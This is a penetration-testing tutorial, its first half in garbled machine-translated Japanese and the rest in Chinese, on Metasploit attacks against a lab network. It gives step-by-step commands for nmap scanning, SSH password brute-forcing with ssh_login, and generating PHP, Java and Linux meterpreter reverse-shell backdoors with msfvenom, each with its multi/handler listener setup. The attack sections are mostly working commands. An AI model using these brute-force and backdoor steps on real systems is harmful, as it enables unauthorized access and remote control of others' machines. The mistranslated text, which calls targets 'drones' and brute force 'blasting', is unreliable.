Metasploitの浸透バックドアLinuxシステムおよびクロスプラットフォームのバックドア世代
ターゲットホストSSHブラスト1.Metasploitを
1.1ブラスト処理
2.PHPバックドアを生成
3.JAVAバックドア発生
4.LINUXバックドアを生成する
リファレンスマニュアルを
ターゲットホストのSSHブラストに1.Metasploit
1.原理:ドローンルート・ユーザは、ターゲットホストのSSHサービスをクラックする列挙法を使用して、弱いパスワード抜け穴が存在します
1.1ブラスト処理
:1.内部LANの生存ホストれていることを確認しnmap -sP 192.168.73.0/24
無人偵察機がIPを取得します。
2.スキャンドローン・オペレーティング・システム:nmap -O 192.168.73.128
;ドローンオペレーティングシステムとバージョン番号を取得します
オープンポートおよびアプリケーション3スキャンドローンバージョン番号:nmap -sV -Pn 192.168.73.128
; 22個のポートは、そのアプリケーションがSSHで、オープン見出さ
4.オープンMetasploitのツール、使用MSF ssh_loginモジュールドローンSSHブルートフォースパスワード:use auxiliary/scanner/ssh/ssh_login
;モジュールの入力show options
設定を
5.ユーザー名とパスワード辞書の辞書を設定します(特定の番号を設定するには、ブラスト時間、ユーザー名とパスワードを低減するために)
- USER.TXTとpass.txtカーリーLinuxで指定したディレクトリにファイル
6. SSHバーストする準備ができて:ユーザー名とパスワード辞書辞書へのパスを設定し、設定された糸50;ドローンのIPアドレスを設定し、実行を開始
- 後に示されていない、利用; VERBOSEを設定
true
します
2.PHPバックドア世代
1.例の説明:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php
2.配置Metasploit
,exploit
监听
search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload php/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听
- php后门使用
3.JAVA后门生成
1.示例指令
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar
2.配置Metasploit
,exploit
监听
search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload java/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听
- java后门使用
4.LINUX后门生成
1.示例指令:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell
2.配置Metasploit
,exploit
监听
search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听
- linux后门使用
参考文档
- https://blog.csdn.net/Tahir_111/article/details/82389570
- https://bbs.ichunqiu.com/thread-20137-1-1.html
- Metasploit后门渗透Linux系统以及跨平台后门生成.md
2019-08-28 14:27:50 星期三
<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">